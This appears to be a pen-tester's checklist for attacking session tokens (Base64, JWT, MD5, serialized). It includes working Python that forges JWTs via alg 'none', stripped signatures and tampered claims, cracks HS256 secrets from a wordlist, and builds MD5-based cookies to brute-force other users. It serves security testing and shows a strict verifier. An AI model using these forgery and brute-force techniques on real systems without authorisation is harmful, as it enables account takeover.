Attack Tokens
All Token Types - Start Here
  • Pick a request that returns different responses for invalid tokens (e.g. any endpoint that requires authentication such as a basket or my account page).
  • Test whether the authenticated request still works without the token.
  • When there are 2 tokens, e.g. "session" and "stay-logged-in", always check whether requests work with only one of them. Test both tokens with the applicable method below.
Base64
  • Decode it.
  • On a pen test, if repeated logins are allowed (no lockout or CAPTCHA), run Burp Sequencer on the login request to collect a large sample of tokens. For a base64 token, tick the "Base64-decode before analysing" checkbox.
  • Can it be brute-forced? If Sequencer was run, save the generated tokens and compare them; if not, log in as another user and compare the 2 decoded tokens. Look for parts that stay static, count up, look like timestamps, or are derived from the username or password.
  • Check whether the token is invalidated server-side after logging out (replay it after logout). If it still works, report it as "Improper Session Management".
JWT - JSON Web Tokens
  • Analyse it with the JWT Editor extension, jwt.io or jwt_tool. Note down the algorithm in the header; it may be worth mentioning in a pen test report if it is weak.
  • Modify claims while keeping the original signature. Change the user to the one from the 2nd account and also to an invalid/non-existent user.
  • Remove the signature entirely (keep the trailing dot).
  • Change the signature algorithm, e.g. to none (also try the spellings None, NONE and nOnE, which lax parsers accept).
  • Header injection attacks if the header carries jwk, jku or kid parameters.
  • Using the JWT Editor Burp extension makes it quicker to test for JWT attacks.
  • Brute-force the signing secret offline with hashcat or jwt_tool. Note down whether the secret can be found with a big wordlist. Online cracking services should only be used for test labs or non-production environments, since the token leaves your control.
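The JWT checks above, as an added, self-contained example (not part of the original notes and not taken from JWT Editor or jwt_tool): it mints a constructed HS256 sample token with an assumed weak secret, then shows the four manipulations in order (claims changed with the old signature kept, signature stripped, alg set to a "none" variant, offline secret brute force against a wordlist) next to a reference verifier that pins the algorithm and checks the MAC, so you can see exactly which check on the server defeats each one. Only the standard library is used; the secret, usernames and claims are made up.

```python
import base64
import binascii
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_part(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Mint a token the way an HS256 server would (used here only to build the sample)."""
    signing_input = f"{encode_part(header)}.{encode_part(payload)}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def decode_unverified(token: str):
    """What jwt.io / JWT Editor display: header and claims, signature ignored."""
    h, p, _sig = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p))


def tamper_claims(token: str, new_claims: dict) -> str:
    """Attack 1: rewrite claims but keep the original signature (does the server verify at all?)."""
    h, p, sig = token.split(".")
    payload = json.loads(b64url_decode(p))
    payload.update(new_claims)
    return f"{h}.{encode_part(payload)}.{sig}"


def strip_signature(token: str) -> str:
    """Attack 2: drop the signature entirely, leaving the trailing dot."""
    h, p, _sig = token.split(".")
    return f"{h}.{p}."


def alg_none(token: str, new_claims: dict, spelling: str = "none") -> str:
    """Attack 3: alg=none (or a case variant such as None / NONE) with an empty signature."""
    header, payload = decode_unverified(token)
    header["alg"] = spelling
    payload.update(new_claims)
    return f"{encode_part(header)}.{encode_part(payload)}."


def crack_hs256_secret(token: str, wordlist):
    """Attack 4: offline brute force, same idea as hashcat -m 16500 or jwt_tool's crack mode."""
    h, p, sig = token.split(".")
    signing_input = f"{h}.{p}".encode()
    target = b64url_decode(sig)
    for word in wordlist:
        candidate = hmac.new(word.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(candidate, target):
            return word
    return None


def verify_hs256(token: str, secret: bytes):
    """Reference of a correct server: pin the algorithm, then check the MAC. Returns claims or None."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    h, p, sig = parts
    try:
        header = json.loads(b64url_decode(h))
        expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if header.get("alg") != "HS256":          # defeats alg=none and its spellings
            return None
        if not hmac.compare_digest(expected, b64url_decode(sig)):  # defeats attacks 1 and 2
            return None
        return json.loads(b64url_decode(p))
    except (ValueError, binascii.Error, AttributeError):
        return None


# Constructed sample: a deliberately weak secret and a low-privilege user.
SECRET = b"secret1"
SAMPLE = sign_hs256({"alg": "HS256", "typ": "JWT"}, {"sub": "wiener", "role": "user"}, SECRET)

if __name__ == "__main__":
    for name, forged in [
        ("claims tampered, signature kept", tamper_claims(SAMPLE, {"sub": "administrator"})),
        ("signature stripped", strip_signature(SAMPLE)),
        ("alg=None", alg_none(SAMPLE, {"role": "admin"}, "None")),
    ]:
        print(f"{name:35s} accepted by strict verifier: {verify_hs256(forged, SECRET) is not None}")
    print("secret recovered:", crack_hs256_secret(SAMPLE, ["password", "admin", "secret1"]))
```

A server that accepts any of the three forged tokens has the corresponding finding; the brute-force result tells you whether the secret itself is weak enough to report, and the wordlist loop is the part hashcat parallelises.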
MD5
  • Check whether part of the token is the MD5 of the user's password (a 32-character hex string is the tell): $ echo -n 'user_password' | md5sum.
  • Can it be brute-forced? If your own token has the format username:md5_of_your_password, brute-force it for another user with Burp Intruder:
    • mark the whole base64 token in the request as the payload position and use a password wordlist as the payload;
    • add the payload processing rule Hash: MD5;
    • then add a prefix: the target username followed by ":";
    • then Base64-encode everything.
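The Base64 and MD5 steps above, as an added example (not part of the original notes): it decodes a token tolerating stripped padding and the URL-safe alphabet, checks each field of the decoded token against hashes of the known password (MD5 as on this page, and also SHA-1/SHA-256, which goes slightly beyond the note), diffs two users' decoded tokens to show which bytes vary per user, and reproduces the Intruder pipeline (hash, prefix, base64) as a generator so the candidate tokens can be fed to any client. The account names, password and token are constructed for the demo.

```python
import base64
import hashlib

# Constructed sample: our own account and a session token in the "username:md5(password)" format.
OWN_USERNAME = "wiener"
OWN_PASSWORD = "peter"
OWN_TOKEN = base64.b64encode(
    f"{OWN_USERNAME}:{hashlib.md5(OWN_PASSWORD.encode()).hexdigest()}".encode()
).decode()

HASHES = {"md5": hashlib.md5, "sha1": hashlib.sha1, "sha256": hashlib.sha256}


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def decode_token(token: str) -> str:
    """Base64-decode, tolerating stripped padding and the URL-safe alphabet."""
    s = token.strip().replace("-", "+").replace("_", "/")
    s += "=" * (-len(s) % 4)
    return base64.b64decode(s, validate=True).decode("latin-1")


def find_password_hash(token: str, password: str, sep: str = ":"):
    """Return (algorithm, field index) if a field of the decoded token is a hex digest of the password."""
    fields = decode_token(token).split(sep)
    for name, fn in HASHES.items():
        digest = fn(password.encode()).hexdigest()
        for i, field in enumerate(fields):
            if field.lower() == digest:
                return name, i
    return None


def diff_decoded(token_a: str, token_b: str):
    """Positions at which two users' decoded tokens differ: static vs per-user parts."""
    a, b = decode_token(token_a), decode_token(token_b)
    return [i for i in range(max(len(a), len(b))) if a[i:i + 1] != b[i:i + 1]]


def forge_tokens(username: str, wordlist, sep: str = ":"):
    """The Intruder payload pipeline: Hash MD5 -> add prefix 'username:' -> Base64-encode."""
    for pw in wordlist:
        yield base64.b64encode(f"{username}{sep}{md5_hex(pw)}".encode()).decode()


if __name__ == "__main__":
    print("decoded:", decode_token(OWN_TOKEN))
    print("password hash found at:", find_password_hash(OWN_TOKEN, OWN_PASSWORD))
    for candidate in forge_tokens("carlos", ["123456", "password", "montoya"]):
        print("try cookie:", candidate)
```

Each token yielded by forge_tokens is what one Intruder request would carry; the request that gets the "valid token" response from step 1 of this page identifies the other user's password.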
Serialized Tokens
  • Decode it (base64, URL-safe base64 or hex) and inspect the bytes manually; serialized objects have recognisable magic bytes or text markers.
  • If scanning is in scope, immediately start a DAST scan on a GET request that carries the token.
  • Try token deserialization attacks if the scanner results or the decoded bytes suggest serialization. Refer to Token Deserialization for a methodology.
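The manual decode-and-inspect step above, as an added example (not part of the original notes): it tries the raw, hex and base64 readings of a token and matches the start of each against the well-known markers of common serialization formats (Java's 0xACED0005, Python pickle's 0x80 plus protocol byte, Ruby Marshal's 0x04 0x08, the .NET BinaryFormatter header, and PHP serialize() text). It only looks at bytes and never deserializes anything; the sample tokens are constructed here, and pickle is imported solely to build one of them.

```python
import base64
import binascii
import pickle
import re

# Magic bytes at offset 0 of the serialized stream.
SIGNATURES = [
    ("Java serialized object", bytes.fromhex("aced0005")),
    ("Ruby Marshal", b"\x04\x08"),
    (".NET BinaryFormatter", bytes.fromhex("0001000000ffffffff")),
]
PHP_SERIALIZED = re.compile(rb'^(?:O:\d+:"[^"]+":\d+:\{|a:\d+:\{|s:\d+:"|i:-?\d+;|b:[01];)')


def candidate_decodings(token: str):
    """Yield (encoding, bytes) for each plausible reading of the token."""
    s = token.strip()
    yield "raw", s.encode("latin-1", "replace")
    if len(s) % 2 == 0 and re.fullmatch(r"[0-9a-fA-F]+", s):
        yield "hex", bytes.fromhex(s)
    b64 = s.replace("-", "+").replace("_", "/")
    b64 += "=" * (-len(b64) % 4)
    try:
        yield "base64", base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        pass


def classify_bytes(data: bytes):
    for name, magic in SIGNATURES:
        if data.startswith(magic):
            return name
    if data[:1] == b"\x80" and len(data) > 1 and 2 <= data[1] <= 5:
        return f"Python pickle protocol {data[1]}"
    if PHP_SERIALIZED.match(data):
        return "PHP serialize()"
    return None


def identify_serialization(token: str):
    """Return (encoding, format) for the first decoding that looks serialized, else None."""
    for encoding, data in candidate_decodings(token):
        fmt = classify_bytes(data)
        if fmt:
            return encoding, fmt
    return None


# Constructed sample tokens, one per format.
JAVA_SAMPLE = base64.b64encode(bytes.fromhex("aced0005") + b"sr\x00\x04User").decode()
JAVA_HEX_SAMPLE = (bytes.fromhex("aced0005") + b"sr\x00\x04User").hex()
PHP_SAMPLE = base64.b64encode(b'O:4:"User":1:{s:4:"name";s:6:"carlos";}').decode()
PICKLE_SAMPLE = base64.urlsafe_b64encode(pickle.dumps({"user": "carlos"}, protocol=2)).decode()
RUBY_SAMPLE = base64.b64encode(b"\x04\x08o:\tUser\x00").decode()
DOTNET_SAMPLE = base64.b64encode(bytes.fromhex("0001000000ffffffff01000000") + b"\x00" * 4).decode()
OPAQUE_SAMPLE = base64.b64encode(b"wiener:5f4dcc3b5aa765d61d8327deb882cf99").decode()

if __name__ == "__main__":
    for label, tok in [("java", JAVA_SAMPLE), ("php", PHP_SAMPLE), ("pickle", PICKLE_SAMPLE),
                       ("ruby", RUBY_SAMPLE), ("dotnet", DOTNET_SAMPLE), ("opaque", OPAQUE_SAMPLE)]:
        print(f"{label:7s} -> {identify_serialization(tok)}")
```

A hit here is the "suspicion of serialization" that justifies moving to the Token Deserialization methodology; a None result does not rule it out (custom or encrypted formats show nothing), it just means there is no obvious marker.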